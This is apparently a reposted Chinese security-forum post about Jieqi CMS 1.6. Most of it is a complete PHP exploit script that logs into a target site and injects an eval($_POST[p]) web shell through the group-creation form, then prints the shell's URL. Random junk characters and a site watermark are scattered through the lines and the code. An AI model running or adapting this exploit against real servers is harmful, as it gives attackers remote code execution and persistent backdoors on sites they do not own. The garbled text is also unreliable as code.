杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。# a( k, ~. Q, Z
2 ?/ Y% k) V" K9 y# i4 @
5 t* a6 Z+ Q, x: w) Y4 {该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
, O6 @- \( N7 T" u8 h 需要有一个能创建圈子的用户。
8 ]9 S* K8 ]1 o" l: G+ v* d. U) @. m8 Z
, U; B7 P6 f" [: S2 ~6 Q. R<?php
6 e. D% _; V" n, X4 B7 X' V 8 i/ |0 b1 g' R4 b
print_r('
! P$ Q! Y' z' h. ~- I+---------------------------------------------------------------------------+' [$ W9 o. L: E+ Q, L; N. a4 o: y& N# t
Jieqi CMS V1.6 PHP Code Injection Exploit
% @/ V" O$ E0 o' W2 h5 e3 q9 y Sby flyh4t
6 A8 m' {. r+ I0 Gmail: phpsec at hotmail dot com$ a3 k- J5 x0 `$ [
team: http://www.wolvez.org! [0 O9 v6 J6 o* I8 p5 C- U9 |
+---------------------------------------------------------------------------+/ i/ l: T5 w# }3 ]; h" x. T6 D
'); /**' l% z0 ]. I# J1 j
* works regardless of php.ini settings
7 G3 V9 P2 @# @0 m' m I+ P*/ if ($argc < 5) { print_r('
6 e; h3 E6 d% {, ]2 w9 |% B+---------------------------------------------------------------------------+7 k+ z- X. o) F5 x
Usage: php '.$argv[0].' host path username
1 h1 f9 n1 q. D9 ]host: target server (ip/hostname) M- A1 n9 J! k2 O! H
path: path to jieqicms " D2 a( I5 v [6 {, O* @/ J$ @
uasename: a username who can create group; A% a$ `# N# E. }" o
Example:
{# v* ^; G6 X5 F( X/ Hphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
. C" G3 I" M2 ?5 k/ K2 ?# K8 \/ a+---------------------------------------------------------------------------+% I/ P& B& L& c, S# S
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
- |% u- s d: O; f8 w- dContent-Disposition: form-data; name="gname"
Y8 j' k! }. [+ U! M: \
) S# P. Z* ~- g/ O9 P6 Y3 Y8 R'; $params .="';"; $params .='eval($_POST[p]);//flyh4t& J# E! \5 Q! Q7 p
-----------------------------23281168279961
7 X& {1 d# u5 x& j+ y! MContent-Disposition: form-data; name="gcatid"7 M$ j! g# s, g$ L/ C
4 \$ v1 j% m, v# J/ p$ p0 C4 O5 s
1$ `# e |! W+ g: Z8 y. Q8 z8 ]
-----------------------------23281168279961
+ a; _% Q& K; W: r. uContent-Disposition: form-data; name="gaudit"" c) Y6 E- A$ M1 V. h
, o3 G. t) C! w( H; h9 A% n2 e1
: _, {- _2 M# f: R9 F: u! D7 E" k-----------------------------23281168279961
1 M1 ?/ I' y9 R3 FContent-Disposition: form-data; name="gbrief"
/ ~ [" r# L% ]3 t9 D0 q' A1 r9 q6 I) K
. z8 ?. v! z# R, a" m ^19 B5 e! n9 W( [' \& a
-----------------------------23281168279961--0 W# l1 U$ n5 G
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
! _5 \% G9 G o4 B7 Q, G5 M/ c. f
. ~; H) B% c- z( M$ S4 rpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |